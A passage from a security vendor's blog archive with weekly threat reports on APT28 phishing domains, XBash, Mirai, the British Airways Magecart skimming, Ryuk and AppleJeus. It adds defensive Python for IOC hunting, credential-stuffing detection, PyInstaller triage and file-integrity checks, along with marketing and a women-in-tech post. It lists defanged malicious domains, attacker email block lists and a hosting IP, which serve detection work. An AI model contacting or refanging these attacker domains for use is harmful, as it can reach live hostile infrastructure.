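            # Any success from a stuffing source is a credential to reset now.
            "successful_logins": sorted(e["user"] for e in evs if e["result"] == "OK"),
        }
    return findings


if __name__ == "__main__":
    for src, info in detect_credential_stuffing(SAMPLE_AUTH_LOG).items():
        print(src, info)
```

On the constructed log, 10.1.1.5 trips the burst rule and 203.0.113.9 is flagged as low-and-slow with one matched credential (erin), while the user who mistyped once and the single-account retries from 198.51.100.4 are left alone. In practice the grouping key is usually source IP combined with user agent or ASN, because a botnet spreads its attempts across many addresses; the shape of the two rules stays the same.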

APT28 Uses Bitcoin to Register Midterm Election Phishing Domains

RiskIQ conducted an investigation into domains that Microsoft sink-holed, which were used in phishing activity that Microsoft attributed to APT28. Microsoft was able to tie the domains in question back to APT28 by tracking historical infrastructure and following the tactics, techniques, and procedures (TTPs) associated with the group over the past few years. The domains were styled to mimic US Senate domains, along with the think tanks Hudson Institute and the International Republican Institute. These domains are currently sink-holed at Microsoft’s IP. The subdomains target mail servers or emulate Microsoft products associated with the domains below:

  • senate[.]group [adfs.senate[.]group]
  • my-iri[.]org [[.]org]
  • hudsonorg-my-sharepoint[.]com [Mail.hudsonorg-my-sharepoint[.]com]
  • office365-onedrive[.]com [Mail.office365-onedrive[.]com]
  • adfs-senate[.]email
  • adfs-senate[.]services

RiskIQ found that APT28 exclusively used domain registrars and hosting providers that accept Bitcoin as payment. This is typical of APT28, which maintains multiple command and control servers for varying durations, cycles the hosting IP, uses registrars that accept Bitcoin, supplies fake phone numbers and names, and uses a registrant email address derived from the domain being registered. The connection to old infrastructure was the IP 154.16.138[.]57, which hosts vpn647639221.softether[.]net, a VPN service abused by APT28 according to the Department of Justice. This IP also hosted ‘mail[.]office365-onedrive[.]com’ on June 26th. The domains also had connections to disinformation campaigns: the domain americafirstpolitics[.]com is hosted on Namecheap’s IP, which also hosts office365-onedrive[.]com. Historical information shows the domain americafirstpolitics[.]com hosting typical disinformation articles and content.

Hosting providers abused by APT28 include Bacloud, Frantech, GloboTech Communications, Info-Tel, MonoVM, Namecheap, Public Domain Registry, and Swiftway. Domains were hosted on various IPs, from rapid cycling that lasted less than a month to domains on Bacloud that were hosted for nearly a year (adfs-senate[.]services was hosted on 185.25.51[.]64 from September 2017 to August 2018). RiskIQ noted that some subdomains were hosted only for a day or two before being taken offline, saying “APT28 [may have] launched attacks from these domains then rapidly disabled routing/hosting to avoid detection or capture of their phishing or malware pages.”

Several of the servers had open ports used for Microsoft’s Remote Desktop Protocol, while others presumably ran SSH on port 22. Almost all, except, ran HTTP, with a few running HTTPS as well. The IPs and had almost matching sets of open ports, the only differences being that the former had port 22 open while the latter had 49157 open, a port that is usually assigned dynamically. Interestingly, they also had open the ports typically used for NetBIOS and the Distributed COM Service Control Manager, which should not be exposed to the internet because they can be used to quickly enumerate every DCOM-related server or service running on a machine. The IP had port 25 open, which is used for SMTP and could indicate its use for sending phishing emails.


  • americafirstpolitics[.]com
  • adfs-senate[.]email
  • mail[.]office365-onedrive[.]com
  • adfs-senate[.]services
  • my-iri[.]org
  • office365-onedrive[.]com
  • senate[.]group
  • adfs[.]senate[.]group
  • mail[.]hudsonorg-my-sharepoint[.]com
  • sharepoint[.]my-iri[.]org
  • hudsonorg-my-sharepoint[.]com
  • vpn647639221[.]softether[.]net
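
Both the Panda Banker malspam domains listed earlier and the APT28 sinkholed domains above are published defanged ([.] in place of .) so they cannot be clicked by accident, and hunting for them the way the Perch SOC describes means refanging them and comparing them against observed DNS queries (and, for the Adwind sample hashes, against file hashes). The Python below is an added example, not Perch's own hunting code: it refangs a subset of the indicators from this page and scans constructed DNS and file-event log lines, matching a query to an indicator when it equals the domain or is one of its subdomains while rejecting look-alikes that merely end in the same letters. The log formats and the sample lines are assumptions made for the demo.

```python
"""Refang the defanged indicators published on this page and hunt for them in logs.

Added example, not Perch's code. The indicator values come from the lists on
this page; the log format and the log lines are constructed for the demo.
"""
import re
from typing import Dict, List, Set

# Subset of the defanged domains listed on this page (Panda Banker malspam
# list and APT28 sinkhole list).
DEFANGED_DOMAINS = [
    "apx[.]email",
    "zombiedebtslayer[.]com",
    "senate[.]group",
    "mail[.]office365-onedrive[.]com",
    "vpn647639221[.]softether[.]net",
]

# One of the Adwind sample SHA-256 hashes listed on this page.
KNOWN_BAD_SHA256: Set[str] = {
    "93a482e554e2a37e6893fdd8cd92537c0ebc7363ac5fac44b7a4af4a2088ea24",
}

# Constructed DNS log: timestamp, source IP, queried name.
SAMPLE_DNS_LOG = """\
2018-10-17T13:04:11Z 10.0.0.21 www.example.com
2018-10-17T13:04:12Z 10.0.0.21 apx.email
2018-10-17T13:05:40Z 10.0.0.33 adfs.senate.group
2018-10-17T13:06:02Z 10.0.0.33 login.microsoftonline.com
2018-10-17T13:07:15Z 10.0.0.45 cdn.zombiedebtslayer.com.
2018-10-17T13:08:01Z 10.0.0.45 notsenate.group
"""

# Constructed file-event log: timestamp, host, SHA-256 of the written file.
SAMPLE_FILE_LOG = """\
2018-10-03T09:12:00Z WS-17 93A482E554E2A37E6893FDD8CD92537C0EBC7363AC5FAC44B7A4AF4A2088EA24
2018-10-03T09:13:10Z WS-17 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""


def refang(indicator: str) -> str:
    """Undo common defanging so the indicator compares with real log data."""
    s = indicator.strip().lower()
    for broken, real in (("[.]", "."), ("(.)", "."), ("[:]", ":")):
        s = s.replace(broken, real)
    return re.sub(r"^hxxp", "http", s)


def domain_hits(query: str, indicator: str) -> bool:
    """True when the query is the indicator itself or one of its subdomains.

    The leading dot in the suffix check keeps 'notsenate.group' from
    matching the indicator 'senate.group'.
    """
    q = query.lower().rstrip(".")  # tolerate a trailing root dot
    return q == indicator or q.endswith("." + indicator)


def scan_dns_log(log_text: str, defanged: List[str]) -> List[Dict[str, str]]:
    """Return one record per DNS log line whose query matches an indicator."""
    indicators = [refang(d) for d in defanged]
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than abort the hunt
        ts, src, qname = parts
        for ind in indicators:
            if domain_hits(qname, ind):
                hits.append({"ts": ts, "src": src, "query": qname, "indicator": ind})
                break
    return hits


def scan_file_log(log_text: str, bad_hashes: Set[str]) -> List[Dict[str, str]]:
    """Return one record per file event whose SHA-256 is a known-bad hash."""
    wanted = {h.lower() for h in bad_hashes}
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, host, digest = parts
        if digest.lower() in wanted:  # hashes are case-insensitive hex
            hits.append({"ts": ts, "host": host, "sha256": digest.lower()})
    return hits


if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG, DEFANGED_DOMAINS):
        print("DNS hit:", hit)
    for hit in scan_file_log(SAMPLE_FILE_LOG, KNOWN_BAD_SHA256):
        print("File hit:", hit)
```

The subdomain rule matters for this list in particular: adfs.senate.group is only caught because senate.group is treated as a parent indicator, and the trailing-dot and case handling are what keep real resolver and EDR output from silently missing a hit.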

Women in Technology: Are things changing?

on September 24, 2018

In preparation for this blog, I decided to do a little research on the subject matter because, well #obvious. I started with the basic Google search of Women in Technology and found Tweets, a couple blogs, and a website literally called At a casual first glance, it seemed like the basic stuff: blogs, ads, social media, etc. But when I took a deeper dive, I realized that almost everything listed was inspirational, spoken with a “women helping other women” voice and tonality, almost as if this was a crisis before it was a concept. Also, where were all the women?

My research took me down an alternate route as I dug a little deeper on this subject, and more and more I was hit with how few women actually are in the tech industry. My blog, which was originally outlined as Women in Technology: A Force to be Reckoned With, quickly shifted tone to What Women in Technology?

As a woman, I couldn’t help but ask myself, why? Why, in a world where women can be all things – from scientists to artists – would they shy away from something as fascinating as technology?

I’m seeing a pattern here, and it’s not all polka dots.

Prior to joining Perch, I worked in marketing/customer relations for a real estate app, and even before that as a marketing director for a company that designed software for green (sustainable) building engineers. You could say the last seven years of my career have been somewhat tech-related, but in looking back, I noticed one major trend: in all three companies men made up 90% of the workspace.

Without making the heads of my co-workers any larger (you can meet them all here) I am honestly surrounded by some highly talented, brilliant individuals, albeit mostly men. I know Perch and my previous companies aren’t anomalies when it comes to the women-to-men ratio, but it’s still something I noticed. The people I work with outside this organization are primarily men and the few women who are employed share similar roles to me or to each other; marketing, finance, event planning, etc.

Christy Coffey, EVP of Operations for MSPISAO, is a very nice rarity when it comes to this. She is one of the few female EVPs in this industry and is very unapologetic for it.

“I started my career writing software when there were very few women in technical positions. I distinctly remember being a database administrator in the late 90’s on a team of ten men. A decade and a half later, I transitioned into cybersecurity where there is a shortage of skilled workers and few women,” said Coffey.

“I am encouraged though. There are organizations like the “Women in Cybersecurity (WiCyS)” who are dedicated to filling unfilled cybersecurity positions with qualified women, and I’ve noticed an uptick in academic scholarships being made available to women pursuing cybersecurity studies. Hopefully, academic and corporate initiatives can drive culture change. We need to attract women to cybersecurity employment opportunities, and retain them.”

Aside from Mrs. Coffey, the majority of the higher positions, the developers, the coders, the CISOs, CEOs and so on, are mainly men. Coincidence? I think not.

According to one article covering women in technology:

  • Women make up more than half of the U.S. workforce, but account for less than 20% of tech jobs.
  • In April 2017 there were 627,000 unfilled positions in tech, even though tech jobs are flourishing: cybersecurity, cloud computing, software.
  • Young girls are discouraged from pursuing STEM at a young age due to a lack of female mentors, hands-on experience and gender inequality.

In a world where #thefutureisfemale, it makes me wonder why this industry, which literally has to be at the forefront of innovation in order to remain relevant, is so behind the times. Is it the industry? Is it that women are still forced into the same roles they have held for so long and find it hard to break the mold? Is it all of the above?

“The tech industry needs more women to ensure its sustainability and success long-term. The inclusion of women in the tech industry will help it succeed long-term and will empower them to build their own success stories in the fastest growing industry worldwide.” — Hilary Laney, CEO of Evia Events.

Change is coming

Women are coming down hard on closing the gender gap and are finally making a statement. Many schools now offer coding as part of the curriculum, from middle and high school up through the college level. At the risk of dating myself, 20 years ago when I was in high school there was nothing of the sort offered to us. It wasn’t until many years later, when I freelanced with a potential start-up called Code Girls, an aspiring company that employed only women coders as outsourced workers, that I knew anything about coding or the lack of women in this space. Now things are different, or at least on the way to being different. If you scroll through social media you may be served ads similar to the one below, promising a future as a UX designer, fronted by a pretty girl in glasses. Is this a step in the right direction or just a tactful social media ad? Maybe both, but at least they know they need to start catering to this demographic.

Female UX Designer

High Profile Women in Tech

It wouldn’t be fair of me to skip over the fact that there have been many influential women in this industry, going back many, many years: from Williamina Fleming and the Harvard “computers” in the late 1800s to, more recently, Joan Ball, who basically invented online dating; Karen Spärck Jones, who introduced the idea and methods of “term weighting,” aka “Google-ing”; and the “mother of computing,” Grace Hopper, who back in the 1940s programmed the Harvard Mark I computer that brought speed and accuracy to military calculations. Some more recent women include Sheryl Sandberg, COO of Facebook, Marissa Mayer, CEO of Yahoo, and Susan Wojcicki, Google’s first marketing manager.

While this is inspiring, it still doesn’t compare to the current status of this industry. According to the National Center for Women & Information Technology (NCWIT), 25% of the computing workforce was female in 2015. Additionally, “Women, especially women of color, are essentially ‘absent’ from technology innovation.”

Percentage Of Women In Tech

Women are shattering the proverbial glass ceiling and breaking the tethers of stale, outdated careers in search of new options. Women are now running for president, launching multi-million dollar companies (hello, Spanx) and acting as CEO for Fortune 500 companies such as General Motors, IBM, PepsiCo, Progressive, and so many more. Women are among the top neurosurgeons, attorneys, CEOs, you-name-it in the world, and it only seems to be getting better. Who knows why tech lags behind, and if or when that will change, but I’d like to see where the future takes us. As a little popstar named Beyoncé once sang, Who run the world? Girls.

Additional info pertaining to women in the tech industry can be found here.

If you are in the industry and would like to share your story, please reach out to us directly at or via the hashtag #PerchWomenWhoLead.

Need the cheat codes to cybersecurity?

on September 21, 2018

Need the cheat codes to cybersecurity?

It’s dangerous to go alone. That must be one reason birds have evolved to flock together. I imagine that as the person responsible for your organization’s security operations, the pressure is on you to always be right. One miss could become a very public incident that distracts the company from its real mission, whether that is financial services, education, or energy. When you’re sitting down to review a possible breach, wouldn’t it make you more confident to have access to real-time intelligence sightings from your industry peers, qualified by trained security analysts in our managed SOC, that include how similar sightings were ultimately dispositioned?

Of course, you could always go alone, but the cost of creating and maturing a corporate security team can be expensive. For compliance, you’d need to invest in multiple security products to cover network security, system security, application security, vulnerability scanning, SIEM, and of course, the threat intelligence that drives it all. You’re smart so you’ll pick products that integrate. But integration might cost extra.

You’ll also need a team to operate all the products, which eats up your training budget. SIEMs and IDSs don’t come with content, so you’ll need licenses to intelligence feeds and/or membership in an ISAC. You may also need a threat intelligence platform (TIP) to manage intelligence feeds and plug them into each security product. To staff a 24x7 SOC you could squeeze by with four threat analysts working 10-hour shifts, but that doesn’t leave you enough coverage for holidays, PTO, and sick days. This can result in analyst burnout and employee churn. Qualified analysts are hard to find, and not just in your area. If you don’t monitor the security products diligently, you could end up like Target. The bare-bones, go-it-alone security program I outlined could take a year to set up and cost over $1.5 million annually, depending on products, staffing, and business location. This may seem like a lot, but the cost of a breach could be double.

Perch helps with a number of these challenges. With Perch you don’t have to worry about connecting the dots between your intelligence feeds, your Perch products, or the security products you’re feeding into Perch. Don’t worry about the TIP, it’s already included with Perch. Perch pipelines threat feeds to threat detectors as a core feature. No middleware required. Perch’s predictable pricing scales with your node count and you’ll never have to add headcount as you grow. You can add security expertise to your organization without renting more office space. With Perch’s managed SOC, best-effort analysis is always included. We alert your team if we think incident response is required and provide remediation advice. Otherwise, your team is free to focus on mission-critical business.

Perch brings real-time network, application, and system events into one hunt stack. Our SOC is able to compare your traffic and sighting history to your peers in the community to make informed decisions about the fidelity of a threat or piece of intel. When you can see further, the table flips on the attacker. Now every time black hats try to rob the bank they will have to evade your hired posse of keyboard cowboys from Texas. One slip-up and the team is alert.

Cybersecurity can be cumbersome and costly if you are uninformed about what products you should buy and, more importantly, the threats that exist. Don’t go alone; use threat intelligence to your advantage. Perch connects you to sharing communities that provide security, knowledge, and, most importantly, supported data to protect your entire network no matter the size. With Perch you get a simple-to-use application that is set up with no costly development and no downtime. Unlock the cheat codes to cybersecurity with Perch!

Threat Report Tuesday September 18th 2018

on September 18, 2018

In this week’s threat report we’re covering two stories: the discovery of XBash malware, and an underground marketplace offering a compromised bank ATM and three company websites for sale.

XBash Malware Discovered

Researchers have discovered XBash, a malware with ransomware, botnet, and coin-mining functionalities. According to their research, XBash abuses weak passwords and unpatched vulnerabilities and is capable of spreading rapidly within an organization’s network. Researchers found that XBash targets Linux-based systems specifically for its ransomware and botnet capabilities, and targets Microsoft Windows-based systems primarily for its coin-mining and self-propagating capabilities. While XBash has ransomware functionality, researchers found no evidence to suggest that XBash would restore data after the ransom is paid.

At the time of report, researchers had observed 48 incoming transactions associated with the malware with a total income of 0.964 bitcoins, indicating that victims had paid roughly $6,000 total. XBash was first developed in Python and then converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution. Instead of generating random IP addresses as scanning destinations like many other botnets, XBash instead retrieves both IP addresses and domain names from its C2 servers for service probing and exploiting. XBash can also scan for vulnerable servers within an enterprise intranet; however, researchers have only observed this functionality in collected samples and have yet to see it in action.
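The report's note that XBash ships as PyInstaller-packed Linux ELF binaries gives a cheap triage signal. The following is an added example, not code from the original report or from the researchers who analysed XBash: PyInstaller appends its archive to the executable and marks it with a fixed 8-byte cookie magic, b"MEI\x0c\x0b\x0a\x0b\x0e", so a scan for that magic in an ELF (or PE) file tells you whether you are looking at bundled Python before you spend time on the native loader. The sample "binaries" below are constructed stand-ins, not real malware, and the python-runtime string check is a heuristic of my own.

```python
"""Triage helper: flag ELF or PE binaries that are PyInstaller bundles.

Added example (not from the original report). PyInstaller's CArchive trailer
starts with the cookie magic below; the sample blobs are constructed.
"""

ELF_MAGIC = b"\x7fELF"
PE_MAGIC = b"MZ"
PYINSTALLER_COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"


def classify_bytes(data: bytes) -> dict:
    """Return a small verdict dict for one binary's raw bytes."""
    if data.startswith(ELF_MAGIC):
        fmt = "elf"
    elif data.startswith(PE_MAGIC):
        fmt = "pe"
    else:
        fmt = "unknown"
    # The cookie sits near the end of the file; rfind finds the last occurrence.
    cookie_at = data.rfind(PYINSTALLER_COOKIE_MAGIC)
    hints = []
    if cookie_at != -1:
        hints.append("pyinstaller-cookie")
    # Heuristic (my assumption, not a PyInstaller invariant): bundles usually
    # carry the interpreter's shared library name somewhere in the file.
    if b"libpython" in data or b"python3" in data.lower():
        hints.append("python-runtime-string")
    return {
        "format": fmt,
        "pyinstaller": cookie_at != -1,
        "cookie_offset": cookie_at,
        "hints": hints,
        "verdict": f"{fmt}-pyinstaller" if cookie_at != -1 else f"{fmt}-plain",
    }


def classify_file(path: str) -> dict:
    """Same verdict for a file on disk (run this inside your sandbox)."""
    with open(path, "rb") as f:
        return classify_bytes(f.read())


# Constructed samples, not real binaries: an ELF header, filler, a python
# library name and a PyInstaller-style trailer; a plain ELF; a packed PE.
SAMPLE_PACKED_ELF = (
    ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 57
    + b"libpython3.6m.so.1.0\x00" + b"\x00" * 32
    + PYINSTALLER_COOKIE_MAGIC + b"\x00" * 80
)
SAMPLE_PLAIN_ELF = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 120
SAMPLE_PACKED_PE = PE_MAGIC + b"\x90\x00" + b"\x00" * 100 + PYINSTALLER_COOKIE_MAGIC + b"\x00" * 80

if __name__ == "__main__":
    for name, blob in [("packed-elf", SAMPLE_PACKED_ELF),
                       ("plain-elf", SAMPLE_PLAIN_ELF),
                       ("packed-pe", SAMPLE_PACKED_PE)]:
        print(name, classify_bytes(blob))
```

A positive hit is the cue to pull the embedded .pyc files with a PyInstaller extractor rather than reverse the ELF loader. The check is trivially defeated by an extra packing layer such as UPX, so treat a negative as "not obviously PyInstaller", not as "native code".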



Mitigation Strategies:

  • Block emails from:
    • backupdatabase@pm[.]me
    • backupsql@pm[.]me
    • backupsql@protonmail[.]com
  • Use strong, non-default passwords
  • Keep up to date on security updates
  • Implement endpoint security on Microsoft Windows and Linux systems
  • Prevent access to unknown hosts on the internet (to block access to command and control servers)
  • Implement and maintain rigorous and effective backup and restoration processes and procedures.

BigPetya Offers Compromised ATM for Sale

Perchy monitors many marketplaces for threat leads, and a compromised ATM for rent caught our eye. Lampeduza, aka BigPetya, a member of multiple underground forums, is selling access to an ATM belonging to a Nigerian bank for $25,000. The actor is also selling access to three different company websites. The first is, an online store linked to 1,000 PCs, available for $5,000. The second is, a company with 500-900 connected computers and a server, available for $4,000, and the last is, available for $10,000. Compromised sites are often leveraged in other attacks. If you start to see these domains pop up in your logs you may want to take a closer look, even though the sites appear legitimate and do not have a negative reputation.


Mitigation Strategies:

  • Monitor your ATM network and system activity for signs of compromise and infection.
  • Monitor these domains and IPs for phishing, scanning, or malware hosting activities:
    • dizucar[.]com -
    • www[.]enel[.]com -
    • californiaoliveranch[.]com -
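The report says to watch for these domains in your logs. Here is an added example of that sweep (it is not code from the original report or from Perch): the IOC list is the report's, kept defanged as published, and a matcher is built that hits the domain itself or any subdomain while rejecting look-alikes such as a prefix glued on ("notdizucar.com") or the IOC used as a leading label of some other domain. The log lines are constructed for the demo and use a made-up key=value layout (client=, name=, url=), so the field regex is the part to adapt to your own format.

```python
"""Sweep DNS and proxy log lines for the compromised domains from the report.

Added example (not from the original report). IOCs are the report's, defanged;
log lines are constructed.
"""
import re

DEFANGED_IOCS = [
    "dizucar[.]com",
    "www[.]enel[.]com",
    "californiaoliveranch[.]com",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable hostname."""
    return ioc.strip().lower().replace("[.]", ".").replace("(.)", ".").rstrip(".")


def build_matcher(iocs):
    """Compile one regex matching each IOC domain, or any subdomain of it, as a whole host.

    The lookarounds reject 'notdizucar.com' (text glued in front) and
    'dizucar.com.evil.example' (IOC used as a leading label), while the
    trailing dot DNS logs often carry ('dizucar.com.') still matches.
    """
    domains = sorted((refang(i) for i in iocs), key=len, reverse=True)
    alternation = "|".join(re.escape(d) for d in domains)
    pattern = (
        r"(?<![a-z0-9.-])"          # not glued onto a preceding label
        r"(?:[a-z0-9-]+\.)*"         # optional subdomain labels
        r"(?:" + alternation + r")"  # one of the IOC domains
        r"(?![a-z0-9-]|\.[a-z0-9])"  # not followed by more label text
    )
    return re.compile(pattern, re.IGNORECASE)


CLIENT_RE = re.compile(r"\bclient=(\S+)")  # assumption: logs carry client=<ip>


def scan_lines(lines, iocs=DEFANGED_IOCS):
    """Return one hit dict per matching line: line number, host seen, IOC, client."""
    matcher = build_matcher(iocs)
    domains = [refang(i) for i in iocs]
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = matcher.search(line)
        if not m:
            continue
        host = m.group(0).lower()
        ioc = next(d for d in domains if host == d or host.endswith("." + d))
        client = CLIENT_RE.search(line)
        hits.append({"line": lineno, "host": host, "ioc": ioc,
                     "client": client.group(1) if client else None})
    return hits


# Constructed log lines for the demo (not real traffic).
SAMPLE_LOG = [
    "2018-09-18T14:02:11Z dns client=10.0.4.23 qtype=A name=dizucar.com. rcode=NOERROR",
    "2018-09-18T14:02:13Z proxy client=10.0.4.23 method=GET url=http://www.enel.com/wp-content/uploads/x.php status=200",
    "2018-09-18T14:03:40Z dns client=10.0.7.9 qtype=A name=cdn.californiaoliveranch.com. rcode=NOERROR",
    "2018-09-18T14:04:02Z dns client=10.0.7.9 qtype=A name=notdizucar.com. rcode=NXDOMAIN",
    "2018-09-18T14:05:55Z dns client=10.0.2.2 qtype=A name=dizucar.com.evil.example. rcode=NOERROR",
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(hit)
```

As the report says, these are legitimate sites with no bad reputation, so a hit is a lead for a closer look at that client (what was fetched, what came back), not a reason to block the domain outright.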

Adding Threat Communities

on September 12, 2018

Perch Security connects you to all your threat intel sources (so you can actually use them). CISO Wes Spencer shows you how, with his typical panache.

Threat Report Tuesday September 11th 2018

on September 11, 2018

In this weekly threat report we’ll cover two topics: 380,000 British Airways customers skimmed in a Magecart breach, and the Mirai and Gafgyt botnets upgraded to fly first class with Apache Struts and SonicWall exploits.

Mirai & Gafgyt get an upgrade

Security researchers uncovered two botnet variants of Mirai and Gafgyt (BASHLITE) upgraded to take advantage of additional vulnerabilities. Both IoT botnets have been associated with DDoS campaigns since November 2016. The Gafgyt version exploits the SonicWall vulnerability (CVE-2018-9866) that affects older, unsupported versions of SonicWall Global Management System (GMS 8.1 and earlier).

The Mirai version exploits the same Apache Struts vulnerability (CVE-2017-5638) associated with the Equifax data breach in 2017, together with 15 other vulnerabilities. These include Linksys E-Series devices (remote code execution), Avcron NVR devices (remote command execution), D-Link devices (remote code execution), CCTVs and DVRs from 70 vendors (remote code execution), EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 (remote code execution), AVTECH IP camera/NVR/DVR devices (unauthenticated command injection), Zyxel routers (CVE-2017-6884), NetGain Enterprise Manager 7.2.562 (ping command injection), NUUO NVRmini 2 3.0.8 (OS command injection), Netgear DGN1000 routers (unauthenticated RCE), D-Link devices (HNAP SoapAction header command execution), D-Link DSL-2750B (OS command injection), MVPower DVR (JAWS webserver authenticated shell command execution), and Dasan GPON routers (CVE-2018-10561, CVE-2018-10562).

Researchers noted that this is the first time the Mirai botnet has targeted a vulnerability in Apache Struts. Researchers have pointed out that the incorporation of exploits targeting Apache Struts and SonicWall could indicate the threat actors are increasingly targeting outdated enterprise devices.


Mitigation Strategies:

  • Keep device firmware and software up to date.
  • Regularly perform network scans for vulnerable devices.
  • Monitor your devices for network traffic that indicates a successful exploit.

British Airways skimmed by Magecart

British Airways recently announced that it suffered a major breach in which customer data was stolen, impacting roughly 380,000 customers. Names, addresses, email addresses, and payment details of customers who completed transactions from 22:58 BST on August 21 until 21:45 BST on September 5 were compromised. The breach reportedly did not expose passport numbers or other travel data.

Researchers revealed how the Magecart threat actor was able to compromise British Airways, much as in the Ticketmaster breach. As reported, data was stolen directly from the website and the mobile app, both of which carry the payment forms. Researchers suspect that Magecart used a cross-site scripting attack against a poorly secured component of the British Airways web page to inject their skimmer code, altering the behavior of the victim’s site. The attack was tailor-made for the British Airways payment page.

Evidence was found that Magecart might have breached the British Airways site days before the skimming began: the attackers’ server used a certificate issued on August 15, days before the reported start date of August 21, 2018. Researchers warn that Magecart builds custom attacks for targeted victims, which is a real threat for online payment processing.

Magecart has likely considered other airlines as targets and this is not the first breach in the aviation sector. Aviation sector businesses should consider community defense and evaluate membership in information sharing and analysis centers like A-ISAC.




Mitigation Strategies:

  • Keep web application components up to date.
  • Regularly scan your web applications for vulnerable components or unauthorized changes.
  • Monitor your web applications via network and log data for indicators of compromise and successful attacks.
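A Magecart skimmer is, at bottom, a change to a script the site already serves, so the "unauthorized changes" item above comes down to a baseline-and-diff of the document root. The following is an added example of that check; it is not code from the original report, from British Airways or from the researchers who analysed the breach. It hashes every file under a document root, stores the manifest as JSON, and reports what was modified, added or removed since the baseline. The document root in the demo is constructed in a temporary directory, and the appended text standing in for the skimmer is a placeholder comment, not real skimmer code.

```python
"""Baseline-and-diff integrity check for a web application's static assets.

Added example (not from the original report). The docroot is constructed.
"""
import hashlib
import json
import os
import tempfile


def build_manifest(root: str) -> dict:
    """Map each path under root (relative, '/'-separated) to its SHA-256 hex digest."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(1 << 16), b""):
                    h.update(chunk)
            manifest[rel] = h.hexdigest()
    return manifest


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Classify every path as modified, added or removed relative to the baseline."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def save_manifest(manifest: dict, path: str) -> None:
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path: str) -> dict:
    with open(path) as f:
        return json.load(f)


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as f:
        f.write(text)


def demo() -> dict:
    """Constructed scenario: baseline a docroot, then tamper with one script and drop a file."""
    root = tempfile.mkdtemp(prefix="docroot-")
    _write(root, "index.html", "<html><script src=/js/vendor.js></script></html>\n")
    _write(root, "js/vendor.js", "window.vendor = {};\n")
    _write(root, "css/site.css", "body{margin:0}\n")
    # Keep the baseline somewhere the web tier cannot write; here, a separate temp dir.
    baseline_path = os.path.join(tempfile.mkdtemp(prefix="baseline-"), "manifest.json")
    save_manifest(build_manifest(root), baseline_path)

    # Simulated tampering: lines appended to an existing library, plus a new file.
    # The appended text is a placeholder, not a real skimmer.
    _write(root, "js/vendor.js", "window.vendor = {};\n/* appended form-submit hook would go here */\n")
    _write(root, "js/extra.js", "// dropped file\n")
    return diff_manifests(load_manifest(baseline_path), build_manifest(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Run it on a schedule from a host that is not the web server, keep the baseline out of the web tier's reach, and re-baseline only as part of a deploy. The diff tells you that a file changed, not what changed; follow a hit with a line diff against the known-good copy from your build artifacts. Scripts loaded from third-party hosts never touch your document root, so they need a separate fetch-and-hash pass.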

Communities Tab: Evaluating Your Threat Intel Sources

on September 4, 2018

See all your threat intelligence sources, compare performance, and predict trends on Perch's Communities tab. Perch Security CISO Wes Spencer deftly demonstrates in this short video.

Threat Report Tuesday August 28th 2018

on August 28, 2018

A Ryuk ransomware campaign targeting large organizations in the US and around the world has made the attackers behind it over $640,000 in bitcoin in the space of just two weeks. It appears to be connected to Lazarus, the hacking group working out of North Korea. The Ryuk campaign is targeting enterprises that are capable of paying a lot of money in order to get back on track.

Secondly, security researchers at Kaspersky Lab have uncovered a new campaign, dubbed “AppleJeus,” carried out by the North Korean APT group Lazarus. The group has been highly active in recent months, and researchers note that this is the first time it has not only targeted Windows systems but also developed and deployed a macOS version of its FallChill malware. The breach was traced back to an unsuspecting employee of a cryptocurrency exchange who downloaded the legitimate-looking third-party application Celas Trade Pro, a cryptocurrency trading program developed by Celas.

Malware: Ryuk ransomware

Ryuk first emerged in mid-August and in the space of just days infected several organizations across the US, encrypting victims’ PCs, storage and data centers and demanding huge Bitcoin ransoms. The attacks are highly targeted, to the extent that the perpetrators conduct tailored campaigns involving extensive network mapping, network compromise and credential theft in order to reach the end goal of installing Ryuk and encrypting systems.


Some Mitigation Strategies:

  • File Integrity Monitoring (FIM) to detect the download of malicious files
  • Intrusion detection systems (IDS) would detect additional payload downloads
  • A solid Backup strategy for easy restore as not to disrupt business operations
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Malware: AppleJeus

The malware first checks whether the victim is worth attacking. It runs an auto-updater which contacts the C&C server to download and run additional executables, including the payload, the Fallchill backdoor. Fallchill then gives the attackers remote control of the victim’s computer. Researchers suspect Celas is a fake company created by the North Koreans, and believe that a Linux version of the malware might already be circulating, if not in development.


Some Mitigation Strategies:

  • Intrusion detection systems (IDS) to monitor for communication to the C2 network
  • Email filtration to find malicious attachments
  • FIM looking for the downloaded executables related to the fallchill backdoor
  • 24x7 Security Monitoring for malicious behavior and immediate incident response

Release Notes

August 24, 2018

  • Added the ability to change an alert from “Escalated” to another status from the Dashboard
  • Added the time remaining to triage an alert and fulfill the applied SLA for MSSP users
  • Added SLA management for MSSP users
  • Added webhook support for Alerts ( Beta )
  • Added MS-ISAC and NCU-ISAO communities ( Beta )

  • The new and improved Alerts list is now live and the old Alerts list has been removed

Threat Report Thursday August 23rd 2018

on August 23, 2018

